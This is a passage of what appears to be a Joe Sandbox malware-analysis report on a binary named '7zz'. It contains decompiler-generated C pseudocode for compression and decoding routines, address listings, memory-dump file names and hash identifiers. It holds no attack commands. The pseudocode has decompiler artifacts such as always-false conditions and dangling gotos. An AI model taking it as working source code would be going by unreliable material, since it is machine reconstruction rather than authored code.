											L00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8cec)));
											_t276 = _t276 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t276 -  *(_t269 + 0x198);
										} while (_t276 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									L00467B30(_t269 + 0x1a8);
									_t277 =  *(_t269 + 0x1ac);
									__eflags = _t277 - _t186;
									if(_t277 == _t186) {
										L32:
										E004486E0(0x17);
										E004486E0(0x72);
										E004486E0(0x45);
										E004486E0(0x38);
										E004486E0(0x50);
										E004486E0(0x90);
										E00448700(_t269,  *((intOrPtr*)(_t269 + 0x174)));
										_t274 =  *(_t264 + 0x28);
										__eflags = _t274 - 8;
										if(_t274 < 8) {
											__eflags = _t274;
											if(_t274 > 0) {
												while(1) {
													_t137 =  *(_t264 + 0x28);
													__eflags = _t274 - _t137;
													if(_t274 < _t137) {
														break;
													}
													_t274 = _t274 - _t137;
													_t219 = _t274;
													_t143 = _t186 >> _t219;
													_t186 = _t186 - (_t143 << _t219);
													 *( *((intOrPtr*)(_t264 + 4)) +  *_t264) =  *(_t264 + 0x2c) | _t143;
													_t257 =  *((intOrPtr*)(_t264 + 4)) + 1;
													 *((intOrPtr*)(_t264 + 4)) = _t257;
													__eflags = _t257 -  *((intOrPtr*)(_t264 + 8));
													if(__eflags == 0) {
														L0040EFBD(_t264, __eflags);
													}
													__eflags = _t274;
													 *(_t264 + 0x28) = 8;
													 *(_t264 + 0x2c) = 0;
													if(_t274 > 0) {
														continue;
													} else {
													}
													goto L40;
												}
												_t139 =  *(_t264 + 0x28) - _t274;
												 *(_t264 + 0x28) = _t139;
												_t141 =  *(_t264 + 0x2c) | _t186 << _t139;
												__eflags = _t141;
												 *(_t264 + 0x2c) = _t141;
											}
											L40:
											_t186 = 0;
											__eflags = 0;
										}
										_t265 = L0040EFA1(_t264);
										_t133 =  *(_t269 + 0x2c);
										__eflags = _t133 - _t186;
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										if(_t133 != _t186) {
											 *((intOrPtr*)( *_t133 + 8))(_t133);
											 *(_t269 + 0x2c) = _t186;
										}
										_t134 =  *(_t269 + 0x154);
										__eflags = _t134 - _t186;
										if(_t134 != _t186) {
											 *((intOrPtr*)( *_t134 + 8))(_t134);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t265;
									} else {
										_t169 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t169 - _t186;
										if(_t169 != _t186) {
											 *((intOrPtr*)( *_t169 + 8))(_t169);
											 *(_t269 + 0x2c) = _t186;
										}
										_t170 =  *(_t269 + 0x154);
										__eflags = _t170 - _t186;
										if(_t170 != _t186) {
											 *((intOrPtr*)( *_t170 + 8))(_t170);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t277;
									}
								}
							} else {
								goto L12;
							}
						} else {
							_t107 = 0x8007000e;
						}
					} else {
						_t278 = 0;
						do {
							_t267 = _t278 +  *((intOrPtr*)(_t269 + 0x178));
							if( *(_t269 + 0x19c) == 0) {
								L7:
								 *((char*)(_t267 + 0x8cdc)) =  *((intOrPtr*)(_t269 + 0x14));
								if(L00447C30(_t267) == 0) {
									L12:
									_t107 = 0x8007000e;
								} else {
									goto L8;
								}
							} else {
								_t6 = _t267 + 0x8ce8; // 0x8ce8
								_t107 = L00467B30(_t6);
								if(_t107 == 0) {
									_t7 = _t267 + 0x8cec; // 0x8cec
									_t107 = L00467B30(_t7);
									if(_t107 == 0) {
										_t8 = _t267 + 0x8cf0; // 0x8cf0
										_t107 = L00467B30(_t8);
										if(_t107 == 0) {
											goto L7;
										}
									}
								}
							}
							goto L55;
							L8:
							_t185 = _t185 + 1;
							_t278 = _t278 + 0x8e00;
						} while (_t185 <  *(_t269 + 0x198));
						goto L9;
					}
				}
				L55:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 + 0x20));
				return _t107;
			}



































                                                                                  0x00449466
                                                                                  0x00449468
                                                                                  0x0044946d
                                                                                  0x0044946e
                                                                                  0x00449479
                                                                                  0x0044947f
                                                                                  0x00449482
                                                                                  0x00449488
                                                                                  0x0044948f
                                                                                  0x0044949b
                                                                                  0x0044949f
                                                                                  0x00449515
                                                                                  0x00449515
                                                                                  0x00449526
                                                                                  0x00449532
                                                                                  0x0044953f
                                                                                  0x00449544
                                                                                  0x00449546
                                                                                  0x00449552
                                                                                  0x00449559
                                                                                  0x00449560
                                                                                  0x0044956c
                                                                                  0x00449573
                                                                                  0x00449578
                                                                                  0x0044957f
                                                                                  0x00449583
                                                                                  0x00449587
                                                                                  0x0044958f
                                                                                  0x00449593
                                                                                  0x00449599
                                                                                  0x0044959f
                                                                                  0x004495a5
                                                                                  0x004495ab
                                                                                  0x004495b4
                                                                                  0x004495bd
                                                                                  0x004495c6
                                                                                  0x004495d4
                                                                                  0x004495df
                                                                                  0x004495e1
                                                                                  0x004496dd
                                                                                  0x004496ed
                                                                                  0x004496ef
                                                                                  0x00449782
                                                                                  0x00449782
                                                                                  0x00449782
                                                                                  0x00000000
                                                                                  0x004496f5
                                                                                  0x004496f5
                                                                                  0x004496fd
                                                                                  0x004496ff
                                                                                  0x00449701
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044970b
                                                                                  0x0044970d
                                                                                  0x0044976a
                                                                                  0x0044976a
                                                                                  0x00449772
                                                                                  0x0044977a
                                                                                  0x0044977c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044970f
                                                                                  0x0044971d
                                                                                  0x00449720
                                                                                  0x00449724
                                                                                  0x00449728
                                                                                  0x00449746
                                                                                  0x0044974a
                                                                                  0x0044974e
                                                                                  0x00449755
                                                                                  0x00449760
                                                                                  0x00449762
                                                                                  0x00449764
                                                                                  0x0044989a
                                                                                  0x0044989d
                                                                                  0x004498a5
                                                                                  0x004498a7
                                                                                  0x004498ac
                                                                                  0x004498af
                                                                                  0x004498af
                                                                                  0x004498b6
                                                                                  0x004498bc
                                                                                  0x004498be
                                                                                  0x004498c0
                                                                                  0x004498c3
                                                                                  0x004498c6
                                                                                  0x004498c6
                                                                                  0x004498d0
                                                                                  0x004498d0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00449764
                                                                                  0x00000000
                                                                                  0x0044970d
                                                                                  0x00449872
                                                                                  0x00449875
                                                                                  0x0044987d
                                                                                  0x0044987f
                                                                                  0x00449884
                                                                                  0x00449887
                                                                                  0x00449887
                                                                                  0x0044988e
                                                                                  0x00449894
                                                                                  0x00449896
                                                                                  0x00000000
                                                                                  0x00449898
                                                                                  0x00000000
                                                                                  0x00449896
                                                                                  0x004495e7
                                                                                  0x004495f3
                                                                                  0x004495fe
                                                                                  0x00449604
                                                                                  0x0044960f
                                                                                  0x00449611
                                                                                  0x00449613
                                                                                  0x00449615
                                                                                  0x00449629
                                                                                  0x00449634
                                                                                  0x00449635
                                                                                  0x0044963b
                                                                                  0x0044963b
                                                                                  0x0044963f
                                                                                  0x0044963f
                                                                                  0x0044963f
                                                                                  0x00449647
                                                                                  0x00449652
                                                                                  0x0044965d
                                                                                  0x0044965f
                                                                                  0x00449661
                                                                                  0x00449663
                                                                                  0x00449677
                                                                                  0x00449682
                                                                                  0x00449683
                                                                                  0x00449689
                                                                                  0x00449689
                                                                                  0x0044968d
                                                                                  0x0044968d
                                                                                  0x0044968d
                                                                                  0x00449695
                                                                                  0x0044969a
                                                                                  0x004496a0
                                                                                  0x004496a2
                                                                                  0x00449784
                                                                                  0x00449788
                                                                                  0x00449791
                                                                                  0x0044979a
                                                                                  0x004497a3
                                                                                  0x004497ac
                                                                                  0x004497b8
                                                                                  0x004497c6
                                                                                  0x004497cb
                                                                                  0x004497ce
                                                                                  0x004497d1
                                                                                  0x004497d3
                                                                                  0x004497d5
                                                                                  0x004497d7
                                                                                  0x004497d7
                                                                                  0x004497da
                                                                                  0x004497dc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004497de
                                                                                  0x004497e2
                                                                                  0x004497e4
                                                                                  0x004497f2
                                                                                  0x004497f6
                                                                                  0x004497ff
                                                                                  0x00449802
                                                                                  0x00449805
                                                                                  0x00449807
                                                                                  0x0044980b
                                                                                  0x0044980b
                                                                                  0x00449810
                                                                                  0x00449812
                                                                                  0x00449819
                                                                                  0x0044981d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044981f
                                                                                  0x00000000
                                                                                  0x0044981d
                                                                                  0x00449824
                                                                                  0x00449828
                                                                                  0x00449830
                                                                                  0x00449830
                                                                                  0x00449832
                                                                                  0x00449832
                                                                                  0x00449835
                                                                                  0x00449835
                                                                                  0x00449835
                                                                                  0x00449835
                                                                                  0x0044983e
                                                                                  0x00449840
                                                                                  0x00449843
                                                                                  0x00449845
                                                                                  0x0044984d
                                                                                  0x00449852
                                                                                  0x00449855
                                                                                  0x00449855
                                                                                  0x00449858
                                                                                  0x0044985e
                                                                                  0x00449860
                                                                                  0x00449865
                                                                                  0x00449868
                                                                                  0x00449868
                                                                                  0x0044986e
                                                                                  0x004496a8
                                                                                  0x004496a8
                                                                                  0x004496ab
                                                                                  0x004496b3
                                                                                  0x004496b5
                                                                                  0x004496ba
                                                                                  0x004496bd
                                                                                  0x004496bd
                                                                                  0x004496c0
                                                                                  0x004496c6
                                                                                  0x004496c8
                                                                                  0x004496cd
                                                                                  0x004496d0
                                                                                  0x004496d0
                                                                                  0x004496d6
                                                                                  0x004496d6
                                                                                  0x004496a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00449528
                                                                                  0x00449528
                                                                                  0x00449528
                                                                                  0x004494a1
                                                                                  0x004494a1
                                                                                  0x004494a3
                                                                                  0x004494b1
                                                                                  0x004494b5
                                                                                  0x004494f0
                                                                                  0x004494f3
                                                                                  0x00449502
                                                                                  0x00449548
                                                                                  0x00449548
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004494b7
                                                                                  0x004494b7
                                                                                  0x004494bd
                                                                                  0x004494c4
                                                                                  0x004494ca
                                                                                  0x004494d0
                                                                                  0x004494d7
                                                                                  0x004494dd
                                                                                  0x004494e3
                                                                                  0x004494ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004494ea
                                                                                  0x004494d7
                                                                                  0x004494c4
                                                                                  0x00000000
                                                                                  0x00449504
                                                                                  0x0044950a
                                                                                  0x0044950b
                                                                                  0x00449511
                                                                                  0x00000000
                                                                                  0x004494a3
                                                                                  0x0044949f
                                                                                  0x004498d2
                                                                                  0x004498da
                                                                                  0x004498e4

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorEventLast$ObjectResetSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2703132900-0
                                                                                  • Opcode ID: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
                                                                                  • Instruction ID: cb7edc23985cc21b463dff47bc8f4930bbb377ff39c12e3229b9d5c30bfef748
                                                                                  • Opcode Fuzzy Hash: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
                                                                                  • Instruction Fuzzy Hash: FBD16030304B059BE714EF79C490AABB7E5BF45318F044A2EE59A87781DB38AC45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00450BD0 Relevance: .3, Instructions: 309COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 92%
                                                                                  			E00450BD0(void* __ecx) {
				intOrPtr _t141;
				char* _t146;
				void* _t149;
				void* _t151;
				intOrPtr* _t153;
				intOrPtr* _t167;
				intOrPtr* _t169;
				int _t190;
				signed int _t191;
				void* _t202;
				unsigned int _t205;
				intOrPtr _t207;
				signed int _t208;
				char* _t210;
				intOrPtr _t215;
				intOrPtr _t244;
				intOrPtr _t247;
				unsigned int _t249;
				unsigned int _t250;
				signed int _t251;
				intOrPtr* _t257;
				int _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				char _t266;
				signed int _t274;
				intOrPtr* _t275;
				void* _t278;
				int _t281;
				void* _t284;
				intOrPtr _t287;
				unsigned int _t291;
				signed int _t294;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t303 = __ecx;
				_t281 = 0;
				goto L1;
				L3:
				while(0 <= 0x10) {
					 *_t257 = 0xffffffff;
					_t202 = _t202 + 1;
					_t257 = _t257 + 4;
					 *((intOrPtr*)(_t305 + 0x3c)) =  *((intOrPtr*)(_t305 + 0x3c)) + 1;
					if(_t202 < 0x14) {
						continue;
					} else {
						_t274 = 0;
						_t141 = 0;
						 *((intOrPtr*)(_t305 + 0x3c)) = 0;
						 *((intOrPtr*)(_t303 + 0x1648)) = 0;
						 *((intOrPtr*)(_t303 + 0x168c)) = 0;
						 *((intOrPtr*)(_t305 + 0x10)) = 0;
						_t258 = 1;
						while(1) {
							_t284 = _t305 + 0x3c + _t258 * 4;
							_t274 = _t274 + ( *(_t305 + 0x3c + _t258 * 4) << 0x10 - _t258);
							 *(_t305 + 0x1c) = _t274;
							if(_t274 > 0x10000) {
								goto L50;
							}
							_t205 = 0x10000;
							if(_t258 != 0x10) {
								_t205 = _t274;
							}
							 *(_t303 + 0x1648 + _t258 * 4) = _t205;
							_t207 =  *((intOrPtr*)(_t303 + 0x1688 + _t258 * 4)) +  *((intOrPtr*)(_t284 - 4));
							 *((intOrPtr*)(_t303 + 0x168c + _t258 * 4)) = _t207;
							 *((intOrPtr*)(_t305 + 0x80 + _t258 * 4)) = _t207;
							if(_t258 <= 9) {
								_t249 =  *(_t303 + 0x1648 + _t258 * 4) >> 7;
								if(_t141 < _t249) {
									_t42 = _t303 + 0x1720; // 0x1720
									_t278 = _t141 + _t42;
									_t250 = _t249 - _t141;
									 *(_t305 + 0x18) = _t250;
									_t302 = _t250;
									_t251 = _t250 >> 2;
									memset(_t278 + _t251, memset(_t278, _t258, _t251 << 2), (_t302 & 0x00000003) << 0);
									_t305 = _t305 + 0x18;
									_t274 =  *(_t305 + 0x1c);
									_t141 =  *((intOrPtr*)(_t305 + 0x10)) + _t302;
									 *((intOrPtr*)(_t305 + 0x10)) = _t141;
								}
							}
							_t258 = _t258 + 1;
							if(_t258 <= 0x10) {
								continue;
							} else {
								_t259 = 0;
								do {
									if(0 != 0) {
										_t208 =  *(_t305 + 0x80);
										 *((intOrPtr*)(_t303 + 0x16d0 + _t208 * 4)) = _t259;
										 *(_t305 + 0x80) = _t208 + 1;
									}
									_t259 = _t259 + 1;
								} while (_t259 < 0x14);
								_t190 = 0;
								 *((intOrPtr*)(_t305 + 0x20)) = 0;
								if( *((intOrPtr*)(_t305 + 0xd0)) <= 0) {
									L51:
									return 1;
								} else {
									_t146 =  *((intOrPtr*)(_t305 + 0xc8));
									_t210 = _t146;
									_t287 =  *((intOrPtr*)(_t305 + 0xcc)) - _t146;
									 *((intOrPtr*)(_t305 + 0x10)) = _t210;
									 *((intOrPtr*)(_t305 + 0x24)) = _t287;
									L19:
									while(1) {
										if(_t190 == 0) {
											_t275 = _t303 + 8;
											_t291 =  *(_t303 + 0x28) >> 0x0000000f -  *((intOrPtr*)(_t303 + 0x2c)) >> 0x00000001 & 0x0000ffff;
											if(_t291 >=  *((intOrPtr*)(_t303 + 0x166c))) {
												_t149 = _t303 + 0x1670;
												_t191 = 0xa;
												if(_t291 >=  *((intOrPtr*)(_t303 + 0x1670))) {
													do {
														_t247 =  *((intOrPtr*)(_t149 + 4));
														_t149 = _t149 + 4;
														_t191 = _t191 + 1;
													} while (_t291 >= _t247);
												}
											} else {
												_t191 =  *((intOrPtr*)((_t291 >> 7) + _t303 + 0x1720));
											}
											_t215 =  *((intOrPtr*)(_t275 + 0x24)) + _t191;
											 *((intOrPtr*)(_t275 + 0x24)) = _t215;
											if(_t215 >= 0x10) {
												do {
													_t167 =  *_t275;
													if(_t167 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x18) =  *_t167;
														 *_t275 = _t167 + 1;
													} else {
														 *(_t305 + 0x18) = E0040E070(_t275);
													}
													_t169 =  *_t275;
													if(_t169 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x1c) =  *_t169;
														 *_t275 = _t169 + 1;
													} else {
														 *(_t305 + 0x1c) = E0040E070(_t275);
													}
													_t244 =  *((intOrPtr*)(_t275 + 0x24)) + 0xfffffff0;
													 *((intOrPtr*)(_t275 + 0x24)) = _t244;
													 *(_t275 + 0x20) = ( *(_t275 + 0x20) << 0x00000008 |  *(_t305 + 0x1c) & 0x000000ff) << 0x00000008 |  *(_t305 + 0x18) & 0x000000ff;
												} while (_t244 >= 0x10);
											}
											_t294 = (_t291 -  *((intOrPtr*)(_t303 + 0x1644 + _t191 * 4)) >> 0x10 - _t191) +  *((intOrPtr*)(_t303 + 0x168c + _t191 * 4));
											if(_t294 >= 0x14) {
												goto L50;
											} else {
												_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t294 * 4));
												if(_t219 != 0x11) {
													if(_t219 != 0x12) {
														if(_t219 == 0x13) {
															_t151 = E00450B20(1);
															_t261 =  *((intOrPtr*)(_t275 + 0x24));
															_t190 = _t151 + 4;
															_t298 =  *(_t275 + 0x20) >> 0x0000000f - _t261 >> 0x00000001 & 0x0000ffff;
															if(_t298 >=  *((intOrPtr*)(_t303 + 0x166c))) {
																_t153 = _t303 + 0x1670;
																 *(_t305 + 0x14) = 0xa;
																if(_t298 >=  *((intOrPtr*)(_t303 + 0x1670))) {
																	do {
																		_t153 = _t153 + 4;
																		 *(_t305 + 0x14) =  *(_t305 + 0x14) + 1;
																	} while (_t298 >=  *_t153);
																}
															} else {
																 *(_t305 + 0x14) = 0;
															}
															 *((intOrPtr*)(_t275 + 0x24)) = _t261 +  *(_t305 + 0x14);
															E00450FC0(_t275);
															_t301 = (_t298 -  *((intOrPtr*)(_t303 + 0x1644 +  *(_t305 + 0x14) * 4)) >> 0x10 -  *(_t305 + 0x14)) +  *((intOrPtr*)(_t303 + 0x168c +  *(_t305 + 0x14) * 4));
															if(_t301 >= 0x14) {
																goto L50;
															} else {
																_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4));
																if( *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4)) > 0x10) {
																	goto L50;
																} else {
																	goto L47;
																}
															}
														} else {
															if(_t219 > 0x10) {
																goto L50;
															} else {
																_t190 = 1;
																L47:
																goto L48;
															}
														}
													} else {
														_t190 = E00450B20(5) + 0x14;
														_t266 = 0;
														goto L48;
													}
												} else {
													_t190 = E00450B20(4) + 4;
													_t266 = 0;
													goto L48;
												}
											}
										} else {
											 *((char*)(_t287 + _t210)) = _t266;
											 *_t210 = _t266;
											 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x20)) + 1;
											 *((intOrPtr*)(_t305 + 0x10)) = _t210 + 1;
											_t190 = _t190 - 1;
											L48:
											if( *((intOrPtr*)(_t305 + 0x20)) >=  *((intOrPtr*)(_t305 + 0xd0))) {
												goto L51;
											} else {
												_t210 =  *((intOrPtr*)(_t305 + 0x10));
												_t287 =  *((intOrPtr*)(_t305 + 0x24));
												continue;
											}
										}
										goto L52;
									}
								}
							}
							goto L52;
						}
						break;
					}
					L52:
				}
				L50:
				return 0;
				goto L52;
				L1:
				 *((char*)(_t304 + _t281 + 0x28)) = E00450B20(4);
				_t281 = _t281 + 1;
				if(_t281 < 0x14) {
					goto L1;
				} else {
					_t257 = __ecx + 0x16d0;
					memset(_t304 + 0x40, 0, 0x10 << 2);
					_t305 = _t304 + 0xc;
					_t202 = 0;
				}
				goto L3;
			}










































                                                                                  0x00450bdc
                                                                                  0x00450bde
                                                                                  0x00450bde
                                                                                  0x00000000
                                                                                  0x00450c08
                                                                                  0x00450c20
                                                                                  0x00450c26
                                                                                  0x00450c27
                                                                                  0x00450c2d
                                                                                  0x00450c2f
                                                                                  0x00000000
                                                                                  0x00450c31
                                                                                  0x00450c31
                                                                                  0x00450c33
                                                                                  0x00450c35
                                                                                  0x00450c39
                                                                                  0x00450c3f
                                                                                  0x00450c45
                                                                                  0x00450c49
                                                                                  0x00450c4e
                                                                                  0x00450c52
                                                                                  0x00450c5f
                                                                                  0x00450c67
                                                                                  0x00450c6b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00450c74
                                                                                  0x00450c79
                                                                                  0x00450c7b
                                                                                  0x00450c7b
                                                                                  0x00450c80
                                                                                  0x00450c8e
                                                                                  0x00450c93
                                                                                  0x00450c9a
                                                                                  0x00450ca1
                                                                                  0x00450caa
                                                                                  0x00450caf
                                                                                  0x00450cb1
                                                                                  0x00450cb1
                                                                                  0x00450cb8
                                                                                  0x00450cbc
                                                                                  0x00450cc2
                                                                                  0x00450cce
                                                                                  0x00450cd8
                                                                                  0x00450cd8
                                                                                  0x00450cde
                                                                                  0x00450ce4
                                                                                  0x00450ce6
                                                                                  0x00450ce6
                                                                                  0x00450caf
                                                                                  0x00450cea
                                                                                  0x00450cee
                                                                                  0x00000000
                                                                                  0x00450cf4
                                                                                  0x00450cf4
                                                                                  0x00450cf6
                                                                                  0x00450cfe
                                                                                  0x00450d00
                                                                                  0x00450d0e
                                                                                  0x00450d16
                                                                                  0x00450d16
                                                                                  0x00450d18
                                                                                  0x00450d19
                                                                                  0x00450d25
                                                                                  0x00450d29
                                                                                  0x00450d33
                                                                                  0x00450fa9
                                                                                  0x00450fb2
                                                                                  0x00450d39
                                                                                  0x00450d39
                                                                                  0x00450d47
                                                                                  0x00450d49
                                                                                  0x00450d4b
                                                                                  0x00450d4f
                                                                                  0x00000000
                                                                                  0x00450d53
                                                                                  0x00450d55
                                                                                  0x00450d76
                                                                                  0x00450d8a
                                                                                  0x00450d92
                                                                                  0x00450daa
                                                                                  0x00450db2
                                                                                  0x00450db7
                                                                                  0x00450db9
                                                                                  0x00450db9
                                                                                  0x00450dbc
                                                                                  0x00450dbf
                                                                                  0x00450dc0
                                                                                  0x00450db9
                                                                                  0x00450d94
                                                                                  0x00450d9b
                                                                                  0x00450d9b
                                                                                  0x00450dc7
                                                                                  0x00450dcb
                                                                                  0x00450dd1
                                                                                  0x00450dd3
                                                                                  0x00450dd3
                                                                                  0x00450dda
                                                                                  0x00450dec
                                                                                  0x00450df0
                                                                                  0x00450ddc
                                                                                  0x00450de3
                                                                                  0x00450de3
                                                                                  0x00450df2
                                                                                  0x00450df9
                                                                                  0x00450e0b
                                                                                  0x00450e0f
                                                                                  0x00450dfb
                                                                                  0x00450e02
                                                                                  0x00450e02
                                                                                  0x00450e33
                                                                                  0x00450e38
                                                                                  0x00450e3b
                                                                                  0x00450e40
                                                                                  0x00450dd3
                                                                                  0x00450e57
                                                                                  0x00450e61
                                                                                  0x00000000
                                                                                  0x00450e67
                                                                                  0x00450e67
                                                                                  0x00450e71
                                                                                  0x00450e8b
                                                                                  0x00450ea5
                                                                                  0x00450ebe
                                                                                  0x00450ec3
                                                                                  0x00450eda
                                                                                  0x00450edf
                                                                                  0x00450ee7
                                                                                  0x00450f03
                                                                                  0x00450f0b
                                                                                  0x00450f13
                                                                                  0x00450f15
                                                                                  0x00450f19
                                                                                  0x00450f1d
                                                                                  0x00450f23
                                                                                  0x00450f15
                                                                                  0x00450ee9
                                                                                  0x00450ef7
                                                                                  0x00450ef7
                                                                                  0x00450f2f
                                                                                  0x00450f32
                                                                                  0x00450f4d
                                                                                  0x00450f57
                                                                                  0x00000000
                                                                                  0x00450f59
                                                                                  0x00450f59
                                                                                  0x00450f63
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00450f63
                                                                                  0x00450ea7
                                                                                  0x00450eaa
                                                                                  0x00000000
                                                                                  0x00450eb0
                                                                                  0x00450eb0
                                                                                  0x00450f65
                                                                                  0x00000000
                                                                                  0x00450f79
                                                                                  0x00450eaa
                                                                                  0x00450e8d
                                                                                  0x00450e98
                                                                                  0x00450e9b
                                                                                  0x00000000
                                                                                  0x00450e9b
                                                                                  0x00450e73
                                                                                  0x00450e7e
                                                                                  0x00450e81
                                                                                  0x00000000
                                                                                  0x00450e81
                                                                                  0x00450e71
                                                                                  0x00450d57
                                                                                  0x00450d5b
                                                                                  0x00450d5e
                                                                                  0x00450d62
                                                                                  0x00450d66
                                                                                  0x00450d6a
                                                                                  0x00450f7b
                                                                                  0x00450f88
                                                                                  0x00000000
                                                                                  0x00450f8a
                                                                                  0x00450f8a
                                                                                  0x00450f8e
                                                                                  0x00000000
                                                                                  0x00450f8e
                                                                                  0x00450f88
                                                                                  0x00000000
                                                                                  0x00450d55
                                                                                  0x00450d53
                                                                                  0x00450d33
                                                                                  0x00000000
                                                                                  0x00450cee
                                                                                  0x00000000
                                                                                  0x00450c4e
                                                                                  0x00000000
                                                                                  0x00450c2f
                                                                                  0x00450f9a
                                                                                  0x00450fa3
                                                                                  0x00000000
                                                                                  0x00450be0
                                                                                  0x00450be9
                                                                                  0x00450bed
                                                                                  0x00450bf1
                                                                                  0x00000000
                                                                                  0x00450bf3
                                                                                  0x00450bfe
                                                                                  0x00450c04
                                                                                  0x00450c04
                                                                                  0x00450c06
                                                                                  0x00450c06
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
                                                                                  • Instruction ID: ad5e04536eb3a377db8700aff306818d5d26cec6f51285805bcfce31696dce2f
                                                                                  • Opcode Fuzzy Hash: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
                                                                                  • Instruction Fuzzy Hash: 5BB1D8367043458FDB28CE28D5906AEB7E1BBC5309F15093EEC86D7782C775A909CB85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0044CA40 Relevance: .3, Instructions: 305COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 73%
                                                                                  			E0044CA40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _t120;
				signed int _t122;
				signed char _t123;
				signed char _t126;
				signed int _t129;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t152;
				signed int _t165;
				signed char _t172;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				intOrPtr* _t193;
				intOrPtr _t266;
				intOrPtr _t277;
				intOrPtr _t289;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				intOrPtr* _t297;
				intOrPtr _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				intOrPtr _t308;
				void* _t309;

				_t299 = __ecx;
				 *((intOrPtr*)(_t309 + 8)) = __ecx;
				E0044C9C0(__ecx + 0xd7c, __ecx + 0x73c, 0x120);
				E0044C9C0(__ecx + 0x11fc, __ecx + 0x85c, 0x20);
				_t120 = 0;
				 *((intOrPtr*)(_t309 + 0xc)) = 0;
				if( *((intOrPtr*)(__ecx + 0x508)) > 0) {
					do {
